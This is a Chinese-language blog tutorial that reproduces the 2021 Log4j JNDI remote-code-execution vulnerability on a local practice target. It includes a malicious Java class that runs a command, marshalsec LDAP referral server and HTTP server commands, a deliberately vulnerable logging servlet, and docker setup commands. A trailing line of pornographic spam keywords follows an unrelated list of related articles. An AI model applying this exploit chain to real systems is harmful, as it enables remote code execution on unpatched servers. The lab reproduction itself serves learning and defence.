<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Log4J 漏洞復現+漏洞靶場

    VSole2021-12-10 15:36:47

    前言

    昨天晚上朋友圈算是過了年了,一個log4j大伙都忙了起來,看著朋友圈好久沒這么熱鬧了。Apache 的這個log4j這個影響范圍的確是大,包括我自己做開發的時候也會用到log4j,這就很尷尬了。

    大家也不要在公網上瘋狂測試了,我給大家帶來了漏洞靶場,攻擊視頻在下文,一步一步教你。

    漏洞原理我改天會詳細的寫一篇文章出來,今天就主要是復現一下漏洞。

    昨晚爆出的log4j rce 是通過lookup觸發的漏洞,但jdk1.8.191以上默認不支持ldap協議,對于高版本jdk,則需要一定的依賴。不過為了給大家最簡單的說明,我這里還是用jdk1.8.144的版本來運行。

    這個漏洞和fastjson的漏洞利用如出一轍,首先需要編寫一個惡意類。

    public class Exploit {
      public Exploit(){
        try{
          // 要執行的命令
          String[] commands = {"open", "/System/Applications/Calculator.app"};
          Process pc = Runtime.getRuntime().exec(commands);
          pc.waitFor();
       } catch(Exception e){
          e.printStackTrace();
       }
     }
      public static void main(String[] argv) {
        Exploit e = new Exploit();
     }
    }
    

    這里是彈出計算器

    把這個類編譯之后會得到一個Exploit.class,然后需要在當前目錄下啟動一個web服務,

    python3 -m http.server 8100
    

    然后用marshalsec IDAP服務,項目地址:https://github.com/mbechler/marshalsec

    java -cp /Users/fengxuan/Downloads/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8100/#Exploit"
    

    漏洞類

    package com.evalshell.webstudy;
    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    import java.io.*;
    import javax.servlet.ServletException;
    import javax.servlet.http.*;
    import javax.servlet.annotation.*;
    @WebServlet(name = "helloServlet", value = "/hello-fengxuan")
    public class HelloServlet extends HttpServlet {
      private String message;
      private static final Logger logger = LogManager.getLogger(HelloServlet.class);
      public void init() {
        message = "Hello World!";
     }
      public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
        response.setContentType("text/html");
        response.setHeader("Content-Type", "text/html; charset=utf-8");
        System.out.println(request.getQueryString());
        // Hello
        PrintWriter out = response.getWriter();
        out.println("");
        out.println("你好,兄弟,請用post請求來搞我!");
        out.println("");
     }
      protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        String name = req.getParameter("c");
        System.out.println(name);
        logger.error(name);
        resp.setContentType("text/html");
        resp.setHeader("Content-Type", "text/html; charset=utf-8");
        PrintWriter out = resp.getWriter();
        out.println("");
        out.println("
    可惡!又被你裝到了!
    ");
        out.println("");
     }
      public void destroy() {
     }
    }
    

    最后運行

    漏洞靶場

    為了互聯網的安全,也為了給大家學習的環境,有很多同學不知道如何復現,我搭建了一個漏洞靶場,我編寫的docker-compose.yml

    地址是:https://github.com/fengxuangit/log4j_vuln

    或者直接運行命令

    docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
    docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
    docker exec -it log4j_vuln_container /bin/bash
    /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
    

    然后訪問你的8080的端口, 訪問 http://127.0.0.1:8080/webstudy/ 就可以了, post的參數為c

    按照視頻教程玩就行。你的靶場你自己隨便玩!


    漏洞log4j
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    2021年12月29日,360漏洞云團隊監測到Apache官方發布了安全更新,修復了一個Apache Log4j2組件中存在的遠程代碼執行漏洞漏洞編號:CVE-2021-44832,漏洞威脅等級:中危,漏洞評分:6.6。
    Spring Cloud 突發漏洞 Log4j2 的核彈級漏洞剛告一段落,Spring Cloud Gateway 又突發高危漏洞,又得折騰了。。。 2022年3月1日,Spring官方發布了關于Spring Cloud Gateway的兩個CVE漏洞,分別為CVE-2022-22946與CVE-2022-22947: 版本/分支/tag:3.4.X
    Apache Log4j2是一款優秀的Java日志框架,最近爆出了一個jndi注入的漏洞,影響面非常廣,各大廠商都被波及。Log4j2作為日志記錄的第三方庫,被廣泛得到使用,這次主要分享一下,最近的一些調試記錄。
    漏洞探測輔助平臺
    2022-12-22 09:14:38
    可幫助檢測漏洞log4j2 fastjson ruoyi Spring RCE Blind SQL Bland XXE. 我習慣于將服務用tmux放到后臺運行2、啟動webserver安裝python依賴注意,需要用python3.7及以上版本,否則會有兼容性問題,多python推薦使用condacd cola_dnslog. 至此,三端已經全部開啟!
    可幫助檢測漏洞log4j2 fastjson ruoyi Spring RCE Blind SQL Bland XXE. 我習慣于將服務用tmux放到后臺運行2、啟動webserver安裝python依賴注意,需要用python3.7及以上版本,否則會有兼容性問題,多python推薦使用condacd cola_dnslog. 至此,三端已經全部開啟!
    明確各級網絡安全責任人。充分利用云原生技術,推進以微服務模式提供各類安全能力組件接口,推進數字電網安全“中樞”所有專業功能組件分層解耦和接口標準化,建立開放生態,支持后續功能疊加演進。增強產品服務供應鏈入網安全。提升已入網產品、服務供應鏈應急能力。實戰化錘煉網絡安全隊伍,加強應急指揮與處置能力。
    RCE 攻擊包括通過使用系統某個級別的漏洞在系統中注入和執行惡意代碼。這允許攻擊者在系統中執行命令、竊取、損壞、加密數據等。
    2021年,注定是人類歷史上極不平凡的一年。新冠疫情不斷反復,全球經濟也在面臨“災后重建”的種種挑戰。同樣的,在互聯網領域領域,“變種病毒”還未被撲滅,新型漏洞就已經開始肆虐。2021 年最后一個月,全球互聯網爆發史詩級高危漏洞Log4J 漏洞,致使互聯網每小時遭到數百萬次攻擊,讓 2021 年成為網絡安全史上破紀錄的一年。Check Point Research (CPR) 報告顯示:2021
    2023年四大“安全債”
    2023-12-20 16:27:23
    即將過去的2023年,網絡安全、云安全、應用安全、數據安全領域暴露的諸多“安全債”中,有四大債務不但未能充分緩解,反而有在新的一年“爆雷”的風險。
    遠程勞動力、混合云和零信任趨勢正在推動安全團隊專注于硬件輔助安全策略,以更好地保護因新冠病毒而發生重大變化的攻擊面。為了應對新的挑戰,硬件輔助安全被視為獲得IT生態系統可見性、管理數字資產以及降低安全團隊和計算成本的有效的創新方
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类